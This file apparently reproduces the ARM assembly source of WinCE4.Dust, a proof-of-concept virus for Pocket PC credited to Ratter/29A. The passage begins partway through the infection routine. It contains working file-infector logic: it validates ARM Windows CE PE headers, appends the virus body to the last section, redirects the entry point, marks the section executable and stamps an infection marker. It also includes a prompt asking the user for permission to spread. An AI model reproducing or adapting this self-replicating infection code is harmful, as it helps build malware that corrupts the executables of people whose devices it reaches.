wince.dust.telvir.txt

WinCE.Dust手机病毒源代码

mov    r7, r0        ; r7 now holds virus_size
add    r0, r0, r4
bl    _align_        ; add it to filesize and
mov    r6, r0        ; align it to filealignment
; r6 holds the new filesize
mov    r0, r5
mov    lr, pc
ldr    pc, [r11, #-28]    ; UnmapViewOfFile
ldr    r0, [r11, #-4]
mov    lr, pc
ldr    pc, [r11, #-40]    ; close mapping handle
;
mov    r0, r8
bl    open_file       ; reopen the file because via
; closing the mapping handle file
; handle was closed too
cmn    r0, #1
beq    infect_file_end
str    r0, [r11, #-8]
mov    r0, r6        ; create mapping again with the
bl    create_mapping    ; new filesize (with virus appended)
cmp    r0, #0
beq    infect_file_end_close_file
str    r0, [r11, #-4]
mov    r0, r6
bl    map_file       ; map it
cmp    r0, #0
beq    infect_file_end_close_mapping
mov    r5, r0
;
; r5 - mapping base
; r7 - virus_size
ldr    r4, [r5, #0x3c]    ; get PE signature offset
add    r4, r4, r5      ; add the base
ldrh   r1, [r4, #6]     ; get NumberOfSections
sub    r1, r1, #1      ; we want the last section header
; so dec
mov    r2, #0x28       ; multiply with section header size
mul    r0, r1, r2
add    r0, r0, r4      ; add optional header start to displacement
add    r0, r0, #0x78     ; add optional header size
ldr    r1, [r4, #0x74]    ; get number of data directories
mov    r1, r1, LSL #3    ; multiply with sizeof(data_directory)
add    r0, r0, r1      ; add it because section headers
; start after the optional header
; (including data directories)
ldr    r6, [r4, #0x28]    ; gimme entrypoint rva
ldr    r1, [r0, #0x10]    ; get last section's size of rawdata
ldr    r2, [r0, #0x14]    ; and pointer to rawdata
mov    r3, r1
add    r1, r1, r2      ; compute pointer to the first
; byte available for us in the
; last section
; (pointer to rawdata + sizeof rawdata)
mov    r9, r1        ; r9 now holds the pointer
ldr    r8, [r0, #0xc]    ; get RVA of section start
add    r3, r3, r8      ; add sizeof rawdata
str    r3, [r4, #0x28]    ; set entrypoint
sub    r6, r6, r3      ; now compute the displacement so that
; we can later jump back to the host
sub    r6, r6, #8      ; sub 8 because pc points to
; fetched instruction (viz LTORG)
mov    r10, r0
ldr    r0, [r10, #0x10]   ; get size of raw data again
add    r0, r0, r7      ; add virus size
ldr    r1, [r4, #0x3c]
bl    _align_        ; and align
str    r0, [r10, #0x10]   ; store new size of rawdata
str    r0, [r10, #0x8]    ; store new virtual size
ldr    r1, [r10, #0xc]    ; get virtual address of last section
add    r0, r0, r1      ; add size so get whole image size
str    r0, [r4, #0x50]    ; and store it
ldr    r0, =0x60000020    ; IMAGE_SCN_CNT_CODE | MAGE_SCN_MEM_EXECUTE |
; IMAGE_SCN_MEM_READ
ldr    r1, [r10, #0x24]   ; get old section flags
orr    r0, r1, r0      ; or it with our needed ones
str    r0, [r10, #0x24]   ; store new flags
ldr    r0, =0x72617461
str    r0, [r4, #0x4c]    ; store our infection mark
add    r1, r9, r5      ; now we'll copy virus body
mov    r9, r1        ; to space prepared in last section
adr    r0, virus_start
mov    r2, r7
bl    simple_memcpy
adr    r0, host_ep      ; compute number of bytes between
; virus start and host ep
adr    r1, virus_start
sub    r0, r0, r1      ; because we'll store new host_ep
str    r6, [r0, r9]     ; in the copied virus body
infect_file_end_unmap_view
mov    r0, r5
mov    lr, pc        ; unmap the view
ldr    pc, [r11, #-28]
infect_file_end_close_mapping
ldr    r0, [r11, #-4]
mov    lr, pc        ; close the mapping
ldr    pc, [r11, #-40]
infect_file_end_close_file
ldr    r0, [r11, #-8]
mov    lr, pc        ; close file handle
ldr    pc, [r11, #-40]
infect_file_end
ldmia   sp!, {r0, r1, r4, r5, pc}   ; and return
ENDP
; a little reminiscence of my beloved book - Greg Egan's Permutation City
DCB    "This code arose from the dust of Permutation City"
ALIGN    4
; this function checks whether the file we want to infect is
; suitable
check_header  PROC
ldrh   r0, [r5]
ldr    r1, =0x5a4d      ; MZ?
cmp    r0, r1
bne    infect_file_end_close_mapping
ldr    r2, [r5, #0x3c]
add    r2, r2, r5
ldrh   r0, [r2]
ldr    r1, =0x4550      ; Signature == PE?
cmp    r0, r1
bne    check_header_end
ldrh   r0, [r2, #4]
ldr    r1, =0x1c0      ; Machine == ARM?
cmp    r0, r1
bne    check_header_end
ldrh   r0, [r2, #0x5C]    ; IMAGE_SUBSYSTEM_WINDOWS_CE_GUI ?
cmp    r0, #9
bne    check_header_end
ldrh   r0, [r2, #0x40]
cmp    r0, #4        ; windows ce 4?
check_header_end
mov    pc, lr
ENDP
; r0 - file
open_file   PROC
str    lr, [sp, #-4]!
sub    sp, sp, #0xc
mov    r1, #3
str    r1, [sp]       ; OPEN_EXISTING
mov    r3, #0
mov    r2, #0
str    r3, [sp, #8]
str    r3, [sp, #4]
mov    r1, #3, 2       ; GENERIC_READ | GENERIC_WRITE
mov    lr, pc
ldr    pc, [r11, #-44]    ; call CreateFileForMappingW to
; get the handle suitable for
; CreateFileMapping API
; (on Win32 calling CreateFile is enough)
add    sp, sp, #0xc
ldr    pc, [sp], #4
ENDP
; r0 - max size low
create_mapping   PROC
str    lr, [sp, #-4]!
mov    r1, #0
sub    sp, sp, #8
str    r0, [sp]
str    r1, [sp, #4]
mov    r2, #4        ; PAGE_READWRITE
mov    r3, #0
ldr    r0, [r11, #-8]
mov    lr, pc
ldr    pc, [r11, #-36]
add    sp, sp, #8
ldr    pc, [sp], #4
ENDP
; r0 - bytes to map
map_file   PROC
str    lr, [sp, #-4]!
sub    sp, sp, #4
str    r0, [sp]
ldr    r0, [r11, #-4]
mov    r1, #6        ; FILE_MAP_READ or FILE_MAP_WRITE
mov    r2, #0
mov    r3, #0
mov    lr, pc
ldr    pc, [r11, #-32]
add    sp, sp, #4
ldr    pc, [sp], #4
ENDP
; not optimized (thus simple) mem copy
; r0 - src
; r1 - dst
; r2 - how much
simple_memcpy   PROC
ldr    r3, [r0], #4
str    r3, [r1], #4
subs   r2, r2, #4
bne    simple_memcpy
mov    pc, lr
ENDP
; (r1 - (r1 % r0)) + r0
; r0 - number to align
; r1 - align to what
_align_    PROC
stmdb   sp!, {r4, r5, lr}
mov    r4, r0
mov    r5, r1
mov    r0, r1
mov    r1, r4
; ARM ISA doesn't have the div instruction so we'll have to call
; the coredll's div implementation
mov    lr, pc
ldr    pc, [r11, #-56]    ; udiv
sub    r1, r5, r1
add    r0, r4, r1
ldmia   sp!, {r4, r5, pc}
ENDP
; this function will ask user (via a MessageBox) whether we're
; allowed to spread or not
ask_user   PROC
str    lr, [sp, #-4]!
mov    r0, #0
adr    r1, text
adr    r2, caption
mov    r3, #4
mov    lr, pc
ldr    pc, [r11, #-12]
cmp    r0, #7
ldr    pc, [sp], #4
ENDP
; notice that the strings are encoded in UNICODE
; WinCE4.Dust by Ratter/29A
caption DCB    "W", 0x0, "i", 0x0, "n", 0x0, "C", 0x0, "E", 0x0, "4", 0x0
DCB    ".", 0x0, "D", 0x0, "u", 0x0, "s", 0x0, "t", 0x0, " ", 0x0
DCB    "b", 0x0, "y", 0x0, " ", 0x0, "R", 0x0, "a", 0x0, "t", 0x0
DCB    "t", 0x0, "e", 0x0, "r", 0x0, "/", 0x0, "2", 0x0, "9", 0x0
DCB    "A", 0x0, 0x0, 0x0
ALIGN    4
; Dear User, am I allowed to spread?
text   DCB    "D", 0x0, "e", 0x0, "a", 0x0, "r", 0x0, " ", 0x0, "U", 0x0
DCB    "s", 0x0, "e", 0x0, "r", 0x0, ",", 0x0, " ", 0x0, "a", 0x0
DCB    "m", 0x0, " ", 0x0, "I", 0x0, " ", 0x0, "a", 0x0, "l", 0x0
DCB    "l", 0x0, "o", 0x0, "w", 0x0, "e", 0x0, "d", 0x0, " ", 0x0
DCB    "t", 0x0, "o", 0x0, " ", 0x0, "s", 0x0, "p", 0x0, "r", 0x0
DCB    "e", 0x0, "a", 0x0, "d", 0x0, "?", 0x0, 0x0, 0x0
ALIGN    4
; Just a little greeting to *** firms :-)
DCB    "This is proof of concept code. Also, i wanted to make avers happy."
DCB    "The situation when Pocket PC antiviruses detect only EICAR file had"
DCB    " to end ..."
ALIGN    4
; LTORG is a very important pseudo instruction, which places the
; literal pool "at" the place of its presence. Because the ARM
; instruction length is hardcoded to 32 bits, it is not possible in
; one instruction to load the whole 32bit range into a register (there
; have to be bits to specify the opcode). That's why the literal
; pool was introduced, which in fact is just an array of 32bit values
; that are not possible to load. This data structure is later
; accessed with the aid of the PC (program counter) register that points
; to the currently executed instruction + 8 (+ 8 because ARM processors
; implement a 3 phase pipeline: execute, decode, fetch and the PC
; points not at the instruction being executed but at the instruction being
; fetched). An offset is added to PC so that the final pointer
; points to the right value in the literal pool.
; the pseudo instruction ldr rX, =<value> while compiling gets
; transformed to a mov instruction (if the value is in the range of
; valid values) or it allocates its place in the literal pool and becomes a
; ldr, rX, [pc, #<offset>]
; similarly adr and adrl instructions serve to loading addresses
; to register.
; this approach's advantage is that with minimal effort we can get
; position independent code from the compiler which allows our
; code to run wherever in the address space the loader will load us.
LTORG
virus_end
; the code after virus_end doesn't get copied to victims
WinMainCRTStartup PROC
b     virus_code_start
ENDP
; first generation entry point
host_entry
mvn    r0, #0
mov    pc, lr
END
** virus_source_end **